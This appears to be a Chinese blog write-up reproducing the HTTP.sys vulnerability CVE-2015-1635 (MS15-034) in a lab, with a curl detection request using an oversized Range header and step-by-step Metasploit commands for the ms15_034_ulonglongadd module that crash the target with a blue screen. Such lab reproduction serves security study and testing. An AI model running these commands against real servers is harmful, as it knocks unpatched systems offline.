zoukankan      html  css  js  c++  java
  • HTTP.SYS(CVE-2015-1635)

    一.漏洞描述
    HTTP.sys远程执行代码漏洞 (CVE-2015-1635)
    在HTTP协议栈(HTTP.SYS)中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
    对于此漏洞,一般都是对目标进行攻击,从而让目标主机死机。当然也可以执行任意代码。
    二.漏洞平台
    Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2(此漏洞存在IIS6.0以上版本)
    在复现过程中,TONG在使用32位的系统时,无法完成复现。这里使用的是64位的系统。
    三.环境搭建
    • 目标环境:windows7-64位(安装IIS 7.0服务)
    • 中间件:IIS
    • IP地址:192.168.137.144
    • 攻击者环境:kali linux
    • 复现工具:MSF
    四.漏洞复现
    1.检测环境是否搭建成功
    在攻击者计算机上访问目标计算机的IP地址,web上出现这样的画面,表示IIS搭建成功。
    2.检测漏洞是否存在
    在kali linux中输入:
    curl http://192.168.137.144 -H “Host: 192.168.137.144” -H “Range: bytes=0-18446744073709551615”
    Range字段值的含义。18446744073709551615转为十六进制是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整型所能表达的最大整数,整数溢出和这个超大整数有关。)
    当返回的TITLE中为Requested Range Not Satisfiable 则表示目标存在HTTP.SYS漏洞
    如果返回的是Bad Request则表示该漏洞不存在

    3.msf利用漏洞
    (1)输入msfconsole打开msf
    (2)输入search ms15-034查询该漏洞
    (3)使用模块攻击
    在这里选择:auxiliary/dos/http/ms15_034_ulonglongadd 模块攻击
    依次输入
    • use auxiliary/dos/http/ms15_034_ulonglongadd
    • show options
    • set rhosts 192.168.137.144
    • set threads 10
    • run
    (4)查看攻击是否成功
    回到目标计算机上出现蓝屏死机,表示我们成功攻击目标,使其死机。

  • 相关阅读:
    学习设计模式之中介者模式
    学习设计模式之责任链模式
    学习设计模式之命令模式
    学习设计模式之桥接模式
    学习设计模式之单例模式
    学习设计模式之迭代器模式
    Spring 源码学习——注册 BeanDefinition
    Html.DropDownListFor
    Home vs2013
    Jquery 操作页面中iframe自动跟随窗口大小变化,而页面不出现滚动条,只在iframe内部出滚动条
  • 原文地址:https://www.cnblogs.com/8ling/p/12823547.html
Copyright © 2011-2022 走看看